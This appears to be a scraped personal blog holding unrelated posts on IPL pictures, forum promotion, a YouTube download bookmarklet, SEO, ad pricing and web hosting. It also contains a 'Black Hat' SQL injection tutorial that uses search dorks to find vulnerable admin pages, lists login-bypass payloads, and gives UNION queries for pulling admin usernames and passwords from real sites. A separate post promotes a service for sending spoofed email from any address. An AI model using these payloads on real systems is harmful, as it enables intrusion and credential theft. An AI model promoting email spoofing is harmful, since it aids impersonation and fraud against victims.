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IPL Season 3 Pictures

I searched for many many website but I got no satishfied reslts about ipl Season 3 pictures but by hard work I collected them. I want to share them to you.

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Category: 5 comments

6 Tips to Get People to Join Your New Forum

2forum.jpg (849×565)
Starting a new forum can be daunting, especially if you don't know where you're going to find the people you need to keep it active. Luckily, there are a few steps you can take that will go a long way toward turning your new posting ground into a vibrant and busy internet community. Read on for a few tips you can do that will encourage new people to join your forum.


1. Be Active In Your Own Forum

Nothing makes a forum seem dead quite like an owner who doesn't post. Make sure you start a topic at least once every day to make it clear that you are an active forum participant. Try to make at least one appearance in every thread on a new forum as long as it remains feasible to do so. This will let your budding community know that you are activeand interested in what everyone is saying.

2. Stay Visible In Your Niche

If you have a forum about car parts, visit other forums and blogs about car parts and make a valuable contribution. Don't advertise your forum directly unless you are in an advertising section, but make yourself an active member of as many car part communities you can find.

Stick a short note about your forum in your posting signature with a link. If you are activeand helpful wherever you go, you will find that many of the other people reading in these communities will be interested in checking yours out.

3. Encourage Forum Members To Help Your Community Grow

If the members you already have are happy with your community and find it helpful, they will probably be more than willing to encourage other people to join. Talk about trying to grow your forum in a sticky post and give community members simple ways to share your link with their friends.

Give your forum community an HTML link with text to copy and paste to make sharing a link simple. Use buttons that allow them to share a forum link with various social networks as well. If a forum member mentions sharing your forum somewhere, be sure to thank them.

4. Help Search Engines Find Your Forum

Many lists will tell you to submit your forum to search engines to get it listed, but sometimes this can actually slow you down. If you are actively promoting your forum with signature links in other blogs and communities, chances are major search engines already know it is there.

Help these search engines know where to list your forum by making sure most of the links pointing to your forum use the text people will be likely to use to look for what you provide. If your forum is about car parts, make sure your links say "car parts community" or something similar. Any time you write something for a blog or website include a note about your forum with a properly formatted link.

5. Make Sure Your New Forum Looks Good

No one wants to use a forum that is unreadable or painful to look at. Keep the interface clean and make sure the colors and skins you choose are nice looking and highly readable. If your forum members say something is making things hard to read, listen to them and change it. Customize everything, from the smiley options to member titles. Nice custom options will help your forum stay memorable.

6. Contests Can Be Useful

Run a few contests that will increase meaningful post counts. Host a contest requesting meaningful posts about a specific topic, and use the voting options that come with most forums to have the community vote on the winner. For prizes, you can give out anything from physical items to custom forum titles.

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Category: , , 4 comments

Download Original Hd quality 4m youtube by javascript

Let's enjoy the superB high qulity hd quality direct download from youtube.
  1. Choose your hd vdo click on it to run (See hd icon available ya not)
  2. Change the HD quality to 720p/1080p
  3. Enter the javascript to the addressbar
  4. Save the file to your hard disk
  5. Enjoy
720p = javascript:swfHTM=document.getElementById("movie_player").getAttribute("flashvars");w=swfHTM.split("&");for(i=0;i<=w.length-1;i++){if(w[i].split("=")[0] == "t"){t=w[i].split("=")[1];}if(w[i].split("=")[0] == "video_id"){videoid=w[i].split("=")[1];}}window.location.href = "" + videoid + "&t="+ t + "="+ "&fmt=22";
1080p = javascript:swfHTM=document.getElementById("movieplayer").getAttribute("flashvars");w=swfHTM.split("&");for(i=0;i<=w.length-1;i++){if(w[i].split("=")[0] == "t"){t=w[i].split("=")[1];}if(w[i].split("=")[0] == "videoid"){videoid=w[i].split("=")[1];}}window.location.href = "" + videoid + "&t="+ t + "="+ "&fmt=37";

If yout have any doubt to thinking the process.Please leave comments,Our team will help you surely
Category: , 4 comments

Step by step guide to make website

The most affordable search engine optimization strategy is to do it yourself. This is much easier said than done. If you're on a budget, the thousands of dollars you can save in consulting fees and services will be worth the effort for your initial strategy. As the site progresses up the search engine charts, you'll need to either hire an expert, or outsource to a consultant. The goal is to make it affordable over a period of time.

If you're going to be successful at this you'll need to follow every step!

Here are the steps you'll take

1. Make sure your site is clean (no broken links) hosted by a reputable company, or by yourself with a static IP address, and fast.
2.Optimize your keywords
3. Submit to the search engines and directories
4.Work on your page rank
5. Add more quality content

Step 1. Make sure your site is clean
A clean site starts with clean hosting. Affordable search engine optimization does not mean free or even cheap. If you're going to host the site yourself, have a static IP address. A dynamic IP address and a DNS redirector will give the search engine robots trouble.

Now that you're properly hosted make sure the site itself is clean. This comprises two primary components. Make sure you have no broken links, and make sure the site loads quickly. This means no unnecessary graphics. You should also test the site to make sure it scales well at different resolutions and with different browsers. This doesn't help with affordable search engine optimization, but it will ensure the visitors you drive to your site will have a pleasant experience.

Step 2. Optimize your keywords and keyword phrases.
Keep your keywords for each page to a minimum of two or three. When you've decided on your keywords do a search with a keyword tool (you can search the web, there are several that are all pretty good) and find out how many searches are done for each phrase.

Step 3. Submit your site to the search engines.
Critical note! Do not use search engine submission software to submit the site. Google's terms of service clearly state that this is a violation. Most quality search engines will see this as spamming the site and penalize you for it. These products are good for working on your page, they are not good for actually doing the submitting. You'll find that the path to affordable search engine optimization, and even professional search engine optimization, offers no short cuts.

Step 4. Work on increasing your page rank.
Remember page rank is that critical metric that boosts you over the top of your competitors, when everything else is equal. To increase your page rank you need to get other sites linking back to you. There are several ways to do this, some of them will help drastically, others will hurt. Link exchange programs were the old way of increasing page rank. Some of them still offer value, but it's limited. You want the links back to your site to be quality, not just a page with a thousand links to people trying to increase page rank. Your best two options are writing articles that get published, and requesting links from vendors and other business partners.

Step5. Add more quality content to your site.
Steps 4 and 5 can work together. As you're writing content for your site you can submit all or part of the page to the article directories to increase your page rank. When adding content to your site, don't go overboard. If you've written a really great piece that doesn't add to your site, use it to submit to gain page rank. If you just add page after page to your site you'll end up with something that's difficult for visitors to use, frustrating them and costing you sales.

We hosted New Domain Name

We UnknownSayantan hosted a new free domain name from url forwarding server
This is for only one year!
We hosted dis site to promote the new homepage of unknownsayantan da
And dere u may can find a new option to send fake mail from any id to any id

Let's enjoy the short url
We are trying to give sum advertisement in a website for getting excited teriffs
We make deal wid him but they are taking to long time to make the banner

Send mail From any ID

Yes it is now possible to have a great fun by sending mail from any id to any id.
Let's have a great fun

Check dis site:-
Note:>- Dis site created by sayantan halder.Please dont use it in any bad purpose!
and in mail dere hav no clues so dat is really dengerous for victims
Category: 1 comments

Advertisement Solution

Your have a gud design wid superB looks and reach metarials but not getting setisfied tariff?? Or your have a worst website and metarial too wors and you wanna to earn money from it? Yes! here is the solution.Give your site's advertisement in unknownsayantan and get lot of tariffs.Yes dats really cheap.

Note:-Costs of advertisement will increase soon! so hurry up.

B1 - Banner Advertisement

Location:-In banner see B1 pointed
Size :-468X60
Free Offer:- Not available
7days value:-Rs.700/-
15days value:-Rs.1000/-
1mnth value:-Rs.1800/-
3mnth value:- Rs.4500/-
6mnth value:-Rs.7500/-
1yar value:- 12,000/-

P1 - In post Advertisement(Cheapest)

Location:-In posts see P1 pointed
Free Offer:- Not available
7days value:-Rs.10/- <5wrd>
15days value:-Rs.20/- <5wrd>
1mnth value:-Rs.30/- <5wrd>
3mnth value:- Rs.50/- <5wrd>
6mnth value:-Rs.70/-
1yar value:- 100/-

S1 - Sidebar (Cheap)

Location:-In sidebar see s1 pointed
Size :-max 30 lttr
Free Offer:- available for 3 days
7days value:-Rs.20/-
15days value:-Rs.30/-
1mnth value:-Rs.40/-
3mnth value:- Rs.60/-
6mnth value:-Rs.100/-
1yar value:- 150/-

S2 - Side Vartical Banner (Costly but Helpfully)

Location:-In side see s1 pointed
Size :-60X468
Free Offer:- Not available
7days value:-Rs.1000/-
15days value:-Rs.1500/-
1mnth value:-Rs.2000/-
3mnth value:- Rs.5000/-
6mnth value:-Rs.8000/-
1yar value:- 15,000/-

Your ads in post

You need to give 5000 and obviousely the post may not bigger and image/lnks r limited u can use

Contact:-please contact at ,we r waiting for u!
Payment method:- Mobile Recharge/ Cheque /Via Money Order

Category: 0 comments

Detailed Basic and Full SQL Injection Tutorial

Q what is sql injection?

A injecting sql queries into another database or using queries to get auth bypass as an admin.

part 1 : Basic sql injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

there are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this


So click submit and you'r in
NOTE not all sites are vulnerable.

part 2: injecting sql queries to extract the admin username and password

ok so lets say we have a site :
there is a list of dork 4 sites lyk this

or the best in my view "full credit to qabandi for discovering this"
"inurl:".php?catid=" site:xxx"

So once you have you'r site
now we add a ' to the end of the url
so the site is'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type order by 1-- "no error" order by 2-- "no error" order by 3-- "no error" order by 4-- "no error" order by 5-- "error"

so this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password
then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
then see if you can get the admin panel if you cant then try the admin panel finder script here
now if the database is version 5 or up
type UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4 UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

well that about wraps up my sql injection tutorial.
you can contact me on
Black Hat

(='.'=) This is Mopsy. Copy and paste bunny
(")_(") to help him gain world domination.

Choosing a good host, The right host for you.

Choosing a good host....
In my opinion when looking for a host you need to do quite a bit of research. If you are the buyer looking for hosting you want a company that has experience, good support and a good price. Depending on what your hosting you will pay more for better support or a better host, Why people who are looking for hosting just look for the cheapest and fastest thing they can find is beyond me. They don't understand you get what you pay for, but hey its cheap right that's the only thing that matters right ? Wrong. Think, sure you getting a good price but how good is your quality ? Does the support staff care about your problem or are you just another account number to them? also Using support tickets are they responsive with quick and accurate data or do they give you the same old same old which a lot of hosts do. Its time to put a little more money forward so receive so much better. This goes for all Shared, Reseller, VPS and dedicated servers.

What i found when choosing a host was that look for a a company who is still growing and not "Huge" yet in the industry. I have found that the big web-hosts out there don't really care about you, they have thousands of other clients that are paying why should they care if your dissatisfied ? But then again you don't want to go and pick a host that completely new and doesn't know everything yet. That's just not a good idea, if you have a problem and they don't knows whats wrong or where to start fixing it your defiantly in trouble. I found that host that have been around for a few years and that are still growing who have a good amount of clients do perfectly there is a good balance of knowledge and support. So basically they have been around to know what they are doing but at the same time do care greatly about your satisfaction.

When researching your host its always a good idea to just do something as simple as a google search with the word "Review" right after the host name, yes i know real basic stuff but you will find alot of forums dedicated to hosting reviews and you will find out any problems people have had with the host and how the host handles their problems and their response times. Also even just talking to their online support fine out if they are using their own servers and where they are located of if they are just a reseller from somewhere such as "ThePlanet", "FDC Servers" or "SoftLayer". Them being resellers of these major companies isn't that bad, usually if you good you can spot when a host is a reseller. (Maybe that's just me seeing how i am currently a reseller of "ThePlanet" and i see the deals resellers get everywhere and its a give away, such as most hosts offering only 2000gb bandwidth plans on dedicated servers.) Never the less Do your research.

All of the above goes with any type of hosting you are looking for but you might need something specific, or need to host something which not all hosts allow such as IRC, Proxies, Porn, Warez, Photo or file uploading sites. Most of what i have just mentioned most hosts will not allow you to host on their basic Shared or reseller packages. For instance Proxies tend to use high amounts of the cpu meaning if you were on shared hosting your proxies could affect the server which in turn would affect everyone else hosted on that server. Same goes for Photo / File upload sites they require high amount of disk space and a host who shows that they offer "Unlimited" space and bandwidth (which isn't true simply cause of the fact that it doesn't exist) wont allow you to host such content, they will probably label it under abuse.

If you having one of the problems about then its time for you to upgrade to a VPS or a Dedicated server. Yes this is a little more pricey but then again you have a lot more resources. Now instead of you using shared hosting which there could be 200 other clients of the same server as you you pay more and now are able to use a certain set of the cpu and ram available for the server (Assuming you are going with a VPS [Virtual Private Server]). But dont go over board when you don't need to, there is always the choice to upgrade when you need to. No bother paying some outrageous amount of money for the best of the best when your websites are just starting out. Most hosts when upgrading will transfer everything for you to your new server assuming you are moving to dedicated. Sure they probably wont advertise this but think about it. Your basically telling them you are wanting to give them more money but need a way to transfer your data from server to server, if you talk to them enough they will do it for you.

Now, if your on a dedicated server there are a whole bunch of new responsibilities, As well as your monthly price is going to go up, but as i stated before so reason to just jump into dedicated servers when all you need is a VPS with median specs. Now that you have your dedicated server you will start having to learn more about it as in knowing what OS (Operating System) to use as well as what CP (Control Panel) to get and will most likely have to pay licensing fees depending on what you choose, But yes there are free ones. Also you will now be setting up your own nameservers is you didn't already do when you had a VPS meaning now your domains are going to use your hosts generic nameservers which are most likely "" and "NS2.YOURHOST.COM" they once you set them up will be for example "NS1.YOURDOMAIN.COM" as well as "NS2.YOURDOMAIN.COM" or what every you would like.

Not to scare any ones but the problems you come into will be more difficult when using a VPS or Dedicated server for several reasons. When hosts set up their shared hosting they set the servers they use for shared to a good all around configuration. When on the other hand when you are using your own dedicated server you are configuration the server to the best possible configuration for what ever you are hosting. But never fear this is where you can always ask your host for help IF you have bought or your server comes with support. You can find good deals on servers but they will not be managed and the host will provide very little assistance with your problems. But then again on the other hand, you could pay more and get your server managed, which cause be more stress free for you if you come into problems. Depends on your budged and what your intentions of hosting are.

There is another option you could do for hosting, which is Colo (Colocation Hosting) which in simple terms is you buying or building your own server then paying a data center to allow you to run your server and use their bandwidth basically just house the server. But there are many different options you need to consider while doing Colo. Some might be for instance how far away if your data center you plan to use and are you able to visit on site and modify you server as you wish ? You will also need to provide your data center with the power, bandwidth and space needs for your server also such as if its rack mounted or tower. Also your server specs is it cheaper for you to spend all that money on a server and pay for Colo which is a lot cheaper then paying for a Dedicated server, but how long with that server be up to data ? Do you plan on upgrading it or would it be cheaper for you to use a different method besides Colo.

There are just some things to consider while choosing the right host for you.
I hope this has helped some people with their decision.
The thoughts and opinions stated here are just of my own (fattwam) you may have different views on all of this.

Thanks for reading, and what do you think ?
